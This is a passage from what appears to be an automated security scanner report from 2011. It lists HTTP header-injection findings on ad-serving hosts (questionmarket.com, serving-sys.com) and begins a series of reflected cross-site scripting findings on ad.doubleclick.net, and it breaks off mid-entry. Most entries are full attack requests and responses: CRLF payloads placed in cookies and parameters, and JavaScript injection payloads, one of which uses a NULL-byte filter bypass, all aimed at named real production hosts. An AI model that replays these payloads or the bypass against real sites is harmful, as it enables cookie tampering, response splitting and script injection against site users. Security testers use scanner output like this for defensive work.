1.34. http://amch.questionmarket.com/adsc/d876089/3/885679/adscout.php [ES cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adsc/d876089/3/885679/adscout.php

Issue detail

The value of the ES cookie is copied into the Set-Cookie response header. The payload 9b893%0d%0a01a1d42b0c5 was submitted in the ES cookie. This caused a response containing an injected HTTP header.

Request

GET /adsc/d876089/3/885679/adscout.php?ord=8309460 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://www.menshealth.com/?cm_mmc=MSN0Paid0Search-_-Mens0Health0Brand-_-Menshealth-_-Mens0Health%7c-%7c1026991568
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=200201823465-2-1_775684-1-1_850797-8-2_39942282-8-1_39942224-8-2_600001445811-2-1_880133-4-2_600001445818-2-1_600001445806-2-1; ES=9b893%0d%0a01a1d42b0c5

Response

HTTP/1.1 200 OK
Date: Thu, 10 Mar 2011 16:43:14 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
X-Powered-By: PHP/4.3.8
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: a209.dl
Set-Cookie: CS1=deleted; expires=Wed, 10-Mar-2010 16:43:13 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=200201823465-2-1_775684-1-1_850797-8-2_39942282-8-1_39942224-8-2_600001445811-2-1_880133-4-2_600001445818-2-1_600001445806-2-1_885679-3-1; expires=Mon, 30-Apr-2012 08:43:14 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=9b893
01a1d42b0c5
_876089-5k:xM-0; expires=Mon, 30-Apr-2012 08:43:14 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,...........D..;

1.35. http://amch.questionmarket.com/adsc/d876089/8/40909683/decide.php [ES cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adsc/d876089/8/40909683/decide.php

Issue detail

The value of the ES cookie is copied into the Set-Cookie response header. The payload be7bc%0d%0a63bff395090 was submitted in the ES cookie. This caused a response containing an injected HTTP header.

Request

GET /adsc/d876089/8/40909683/decide.php?&noiframe=1 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://www.womenshealthmag.com/?cm_sp=Network%20Banner-_-WH-_-Rodale.com&67fb3%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E5d360ec3665=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: linkjumptest=1; CS1=200201823465-2-1_775684-1-1_850797-8-2_39942282-8-1_39942224-8-2_600001445811-2-1_880133-4-2_600001445818-2-1_600001445806-2-1_885679-3-1_500004689310-8-1_500004699231-8-1; ES=be7bc%0d%0a63bff395090

Response

HTTP/1.1 200 OK
Date: Thu, 10 Mar 2011 18:24:43 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
X-Powered-By: PHP/4.3.8
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Set-Cookie: CS1=deleted; expires=Wed, 10-Mar-2010 18:24:42 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=200201823465-2-1_775684-1-1_850797-8-2_39942282-8-1_39942224-8-2_600001445811-2-1_880133-4-2_600001445818-2-1_600001445806-2-1_885679-3-1_500004689310-8-1_500004699231-8-1_40909683-8-1; expires=Mon, 30-Apr-2012 10:24:43 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=be7bc
63bff395090
_876089-4T<xM-0; expires=Mon, 30-Apr-2012 10:24:43 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Content-Length: 46
Content-Type: text/javascript

/* a208.dl - Wed Mar 09 16:56:36 EST 2011 */
;

1.36. http://amch.questionmarket.com/adscgen/st.php [code parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adscgen/st.php

Issue detail

The value of the code request parameter is copied into the Location response header. The payload a8ca6%0d%0aab57d3e3f43 was submitted in the code parameter. This caused a response containing an injected HTTP header.

Request

GET /adscgen/st.php?survey_num=876089&site=60649346&code=40909683a8ca6%0d%0aab57d3e3f43&randnum=6149086 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://www.womenshealthmag.com/?cm_sp=Network%20Banner-_-WH-_-Rodale.com&67fb3%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E5d360ec3665=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: linkjumptest=1; CS1=200201823465-2-1_775684-1-1_850797-8-2_39942282-8-1_39942224-8-2_600001445811-2-1_880133-4-2_600001445818-2-1_600001445806-2-1_885679-3-1_500004689310-8-1_500004699231-8-1; ES=861369-fPdvM-0_775684-pPdvM-0_822109-Hs7xM-oSN_879999-m^RxM-a5B_875649-nl:xM-0_876089-xh:xM-g

Response

HTTP/1.1 302 Found
Date: Thu, 10 Mar 2011 18:24:04 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
X-Powered-By: PHP/4.3.8
DL_S: a230.dl
Set-Cookie: CS1=deleted; expires=Wed, 10-Mar-2010 18:24:03 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=200201823465-2-1_775684-1-1_850797-8-2_39942282-8-1_39942224-8-2_600001445811-2-1_880133-4-2_600001445818-2-1_600001445806-2-1_885679-3-1_500004689310-8-1_500004699231-8-1_876089-1-1; expires=Mon, 30-Apr-2012 10:24:04 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=861369-fPdvM-0_775684-pPdvM-0_822109-Hs7xM-oSN_879999-m^RxM-a5B_875649-nl:xM-0_876089-xh:xM-]/; expires=Mon, 30-Apr-2012 10:24:04 GMT; path=/; domain=.questionmarket.com;
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Location: http://a.dlqm.net/adscgen/log_ut_err.php?adserver=DART&survey_num=876089&site=8-60649346-&code=40909683a8ca6
ab57d3e3f43

Content-Length: 0
Content-Type: text/html


1.37. http://amch.questionmarket.com/adscgen/st.php [site parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adscgen/st.php

Issue detail

The value of the site request parameter is copied into the Location response header. The payload b4fec%0d%0a280adc6526b was submitted in the site parameter. This caused a response containing an injected HTTP header.

Request

GET /adscgen/st.php?survey_num=876089&site=b4fec%0d%0a280adc6526b&code=40909683&randnum=6149086 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://www.womenshealthmag.com/?cm_sp=Network%20Banner-_-WH-_-Rodale.com&67fb3%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E5d360ec3665=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: linkjumptest=1; CS1=200201823465-2-1_775684-1-1_850797-8-2_39942282-8-1_39942224-8-2_600001445811-2-1_880133-4-2_600001445818-2-1_600001445806-2-1_885679-3-1_500004689310-8-1_500004699231-8-1; ES=861369-fPdvM-0_775684-pPdvM-0_822109-Hs7xM-oSN_879999-m^RxM-a5B_875649-nl:xM-0_876089-xh:xM-g

Response

HTTP/1.1 302 Found
Date: Thu, 10 Mar 2011 18:23:59 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
X-Powered-By: PHP/4.3.8
DL_S: a209.dl
Set-Cookie: CS1=deleted; expires=Wed, 10-Mar-2010 18:23:58 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=200201823465-2-1_775684-1-1_850797-8-2_39942282-8-1_39942224-8-2_600001445811-2-1_880133-4-2_600001445818-2-1_600001445806-2-1_885679-3-1_500004689310-8-1_500004699231-8-1_876089-1-1; expires=Mon, 30-Apr-2012 10:23:59 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=861369-fPdvM-0_775684-pPdvM-0_822109-Hs7xM-oSN_879999-m^RxM-a5B_875649-nl:xM-0_876089-xh:xM->/; expires=Mon, 30-Apr-2012 10:23:59 GMT; path=/; domain=.questionmarket.com;
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Location: http://a.dlqm.net/adscgen/log_ut_err.php?adserver=DART&survey_num=876089&site=-1-b4fec
280adc6526b
-&code=40909683
Content-Length: 0
Content-Type: text/html


1.38. http://amch.questionmarket.com/adscgen/sta.php [code parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adscgen/sta.php

Issue detail

The value of the code request parameter is copied into the Location response header. The payload d3db1%0d%0abd31793905f was submitted in the code parameter. This caused a response containing an injected HTTP header.

Request

GET /adscgen/sta.php?survey_num=876089&site=2285373&code=d3db1%0d%0abd31793905f&ut_sys=eb HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://www.womenshealthmag.com/?cm_sp=Network%20Banner-_-WH-_-Rodale.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=200201823465-2-1_775684-1-1_850797-8-2_39942282-8-1_39942224-8-2_600001445811-2-1_880133-4-2_600001445818-2-1_600001445806-2-1; ES=861369-fPdvM-0_775684-pPdvM-0_822109-Hs7xM-oSN_879999-m^RxM-a5B

Response

HTTP/1.1 302 Found
Date: Thu, 10 Mar 2011 16:39:47 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
X-Powered-By: PHP/4.3.8
DL_S: a209.dl
Set-Cookie: CS1=deleted; expires=Wed, 10-Mar-2010 16:39:46 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=200201823465-2-1_775684-1-1_850797-8-2_39942282-8-1_39942224-8-2_600001445811-2-1_880133-4-2_600001445818-2-1_600001445806-2-1_876089-1-1; expires=Mon, 30-Apr-2012 08:39:47 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=861369-fPdvM-0_775684-pPdvM-0_822109-Hs7xM-oSN_879999-m^RxM-a5B_876089-xh:xM-0; expires=Mon, 30-Apr-2012 08:39:47 GMT; path=/; domain=.questionmarket.com;
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Location: http://a.dlqm.net/adscgen/log_ut_err.php?adserver=eb&survey_num=876089&site=8-2285373-&code=d3db1
bd31793905f

Content-Length: 33
Content-Type: text/html

/* /adsc/d876089/8/-1/randm.js */

1.39. http://amch.questionmarket.com/adscgen/sta.php [site parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adscgen/sta.php

Issue detail

The value of the site request parameter is copied into the Location response header. The payload 308d0%0d%0a7110d05c4d2 was submitted in the site parameter. This caused a response containing an injected HTTP header.

Request

GET /adscgen/sta.php?survey_num=876089&site=308d0%0d%0a7110d05c4d2&code=4699231&ut_sys=eb HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://www.womenshealthmag.com/?cm_sp=Network%20Banner-_-WH-_-Rodale.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=200201823465-2-1_775684-1-1_850797-8-2_39942282-8-1_39942224-8-2_600001445811-2-1_880133-4-2_600001445818-2-1_600001445806-2-1; ES=861369-fPdvM-0_775684-pPdvM-0_822109-Hs7xM-oSN_879999-m^RxM-a5B

Response

HTTP/1.1 302 Found
Date: Thu, 10 Mar 2011 16:39:42 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
X-Powered-By: PHP/4.3.8
DL_S: a227.dl
Set-Cookie: CS1=deleted; expires=Wed, 10-Mar-2010 16:39:41 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=200201823465-2-1_775684-1-1_850797-8-2_39942282-8-1_39942224-8-2_600001445811-2-1_880133-4-2_600001445818-2-1_600001445806-2-1_876089-1-1; expires=Mon, 30-Apr-2012 08:39:42 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=861369-fPdvM-0_775684-pPdvM-0_822109-Hs7xM-oSN_879999-m^RxM-a5B_876089-sh:xM-0; expires=Mon, 30-Apr-2012 08:39:42 GMT; path=/; domain=.questionmarket.com;
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Location: http://a.dlqm.net/adscgen/log_ut_err.php?adserver=eb&survey_num=876089&site=-1-308d0
7110d05c4d2
-&code=4699231
Content-Length: 44
Content-Type: text/html

/* /adsc/d876089/-1/500004699231/randm.js */

1.40. http://bs.serving-sys.com/BurstingPipe/adServer.bs [flv parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the flv request parameter is copied into the Set-Cookie response header. The payload c6825%0d%0a63ad61cc419 was submitted in the flv parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=4699231~~0~~~^ebAboveTheFold~0~0~01020^ebAdDuration~899~0~01020^ebAboveTheFoldDuration~899~0~01020&OptOut=0&ebRandom=0.34997580223716795&flv=c6825%0d%0a63ad61cc419&wmpv=0&res=128 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.womenshealthmag.com/?cm_sp=Network%20Banner-_-WH-_-Rodale.com
Origin: http://www.womenshealthmag.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: u2=8f169462-89d3-413e-9058-30f13d4035793H3030; expires=Wed, 08-Jun-2011 12:23:57 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=FLV=c6825
63ad61cc419
&RES=128&WMPV=0; expires=Wed, 08-Jun-2011 12: 23:57 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Thu, 10 Mar 2011 17:23:57 GMT
Connection: close
Content-Length: 0


1.41. http://bs.serving-sys.com/BurstingPipe/adServer.bs [res parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the res request parameter is copied into the Set-Cookie response header. The payload b49be%0d%0a4750443b61 was submitted in the res parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=4699231~~0~~~^ebAboveTheFold~0~0~01020^ebAdDuration~899~0~01020^ebAboveTheFoldDuration~899~0~01020&OptOut=0&ebRandom=0.34997580223716795&flv=10.2154&wmpv=0&res=b49be%0d%0a4750443b61 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.womenshealthmag.com/?cm_sp=Network%20Banner-_-WH-_-Rodale.com
Origin: http://www.womenshealthmag.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: eyeblaster=FLV=10.2154&RES=b49be
4750443b61
&WMPV=0; expires=Wed, 08-Jun-2011 12: 23:58 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Thu, 10 Mar 2011 17:23:57 GMT
Connection: close
Content-Length: 0


1.42. http://bs.serving-sys.com/BurstingPipe/adServer.bs [wmpv parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the wmpv request parameter is copied into the Set-Cookie response header. The payload 4d71c%0d%0a42293c12f4c was submitted in the wmpv parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=4699231~~0~~~^ebAboveTheFold~0~0~01020^ebAdDuration~899~0~01020^ebAboveTheFoldDuration~899~0~01020&OptOut=0&ebRandom=0.34997580223716795&flv=10.2154&wmpv=4d71c%0d%0a42293c12f4c&res=128 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.womenshealthmag.com/?cm_sp=Network%20Banner-_-WH-_-Rodale.com
Origin: http://www.womenshealthmag.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: eyeblaster=BWVal=1402&BWDate=40612.379687&debuglevel=&FLV=10.2154&RES=128&WMPV=4d71c
42293c12f4c
; expires=Wed, 08-Jun-2011 12: 23:57 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Thu, 10 Mar 2011 17:23:57 GMT
Connection: close
Content-Length: 0


2. Cross-site scripting (reflected)  previous
There are 1086 instances of this issue:


2.1. http://ad.doubleclick.net/adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19 [adurl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %0055ee3'-alert(1)-'9f815ea7f25 was submitted in the adurl parameter. This input was echoed as 55ee3'-alert(1)-'9f815ea7f25 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Request

GET /adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BAENoyPd4TZ7sN9X0lAeTivDnB_GQ74ECga7P3B7AjbcBwJyyARABGAEgvs7lDTgAUMTE0OECYMnm9obIo6AZoAHXsf3cA7oBCTcyOHg5MF9hc8gBCdoBOmZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL1NNXzcuMi4zOTI1X0ZpbGUyX0J1cnBfMS4zLjA4Lmh0bWy4AhioAwHRA6UdSeRjy2TM6ANs6APUB-gDwQfoA9UF9QMCAADE&num=1&sig=AGiWqtzNnBgIlsjs7mSmiiLAu_ySFar1ug&client=ca-pub-4063878933780912&adurl=%0055ee3'-alert(1)-'9f815ea7f25 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1299795013&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2FSM_7.2.3925_File2_Burp_1.3.08.html&dt=1299773413750&shv=r20101117&jsv=r20110307&saldr=1&correlator=1299773413772&frm=0&adk=1607234649&ga_vid=2011621435.1299773414&ga_sid=1299773414&ga_hid=15489387&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1075&bih=949&fu=0&ifi=1&dtd=54&xpc=XwwY3tlWp2&p=file%3A//
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 37225
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 10 Mar 2011 16:45:41 GMT
Expires: Thu, 10 Mar 2011 16:45:41 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
zovY2RuL2V4YW1wbGVzL1NNXzcuMi4zOTI1X0ZpbGUyX0J1cnBfMS4zLjA4Lmh0bWy4AhioAwHRA6UdSeRjy2TM6ANs6APUB-gDwQfoA9UF9QMCAADE&num=1&sig=AGiWqtzNnBgIlsjs7mSmiiLAu_ySFar1ug&client=ca-pub-4063878933780912&adurl=%0055ee3'-alert(1)-'9f815ea7f25http://">
...[SNIP]...

2.2. http://ad.doubleclick.net/adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19 [adurl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cd8f9"-alert(1)-"daf8fe6749e was submitted in the adurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BAENoyPd4TZ7sN9X0lAeTivDnB_GQ74ECga7P3B7AjbcBwJyyARABGAEgvs7lDTgAUMTE0OECYMnm9obIo6AZoAHXsf3cA7oBCTcyOHg5MF9hc8gBCdoBOmZpbGU6Ly8vQzovY2RuL2V4YW1wbGVzL1NNXzcuMi4zOTI1X0ZpbGUyX0J1cnBfMS4zLjA4Lmh0bWy4AhioAwHRA6UdSeRjy2TM6ANs6APUB-gDwQfoA9UF9QMCAADE&num=1&sig=AGiWqtzNnBgIlsjs7mSmiiLAu_ySFar1ug&client=ca-pub-4063878933780912&adurl=cd8f9"-alert(1)-"daf8fe6749e HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1299795013&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2FSM_7.2.3925_File2_Burp_1.3.08.html&dt=1299773413750&shv=r20101117&jsv=r20110307&saldr=1&correlator=1299773413772&frm=0&adk=1607234649&ga_vid=2011621435.1299773414&ga_sid=1299773414&ga_hid=15489387&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1075&bih=949&fu=0&ifi=1&dtd=54&xpc=XwwY3tlWp2&p=file%3A//
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7019
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 10 Mar 2011 16:45:40 GMT
Expires: Thu, 10 Mar 2011 16:45:40 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
8vQzovY2RuL2V4YW1wbGVzL1NNXzcuMi4zOTI1X0ZpbGUyX0J1cnBfMS4zLjA4Lmh0bWy4AhioAwHRA6UdSeRjy2TM6ANs6APUB-gDwQfoA9UF9QMCAADE&num=1&sig=AGiWqtzNnBgIlsjs7mSmiiLAu_ySFar1ug&client=ca-pub-4063878933780912&adurl=cd8f9"-alert(1)-"daf8fe6749ehttp://ad.doubleclick.net/2493053/redirect_nexuss_gdn.html");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWi
...[SNIP]...

2.3. http://ad.doubleclick.net/adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19 [ai parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9509f"-alert(1)-"6749c3c0d7d was submitted in the ai parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

